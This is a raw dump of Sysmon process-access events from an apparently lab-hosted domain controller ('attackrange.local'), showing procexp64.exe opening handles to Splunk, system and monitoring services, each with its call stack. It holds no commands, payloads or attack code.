10341000x8000000000000000786162Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786161Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786160Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786159Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786158Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786157Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786156Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786155Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786154Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786153Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786152Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786151Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786150Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786149Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786148Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786147Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786146Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786145Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\T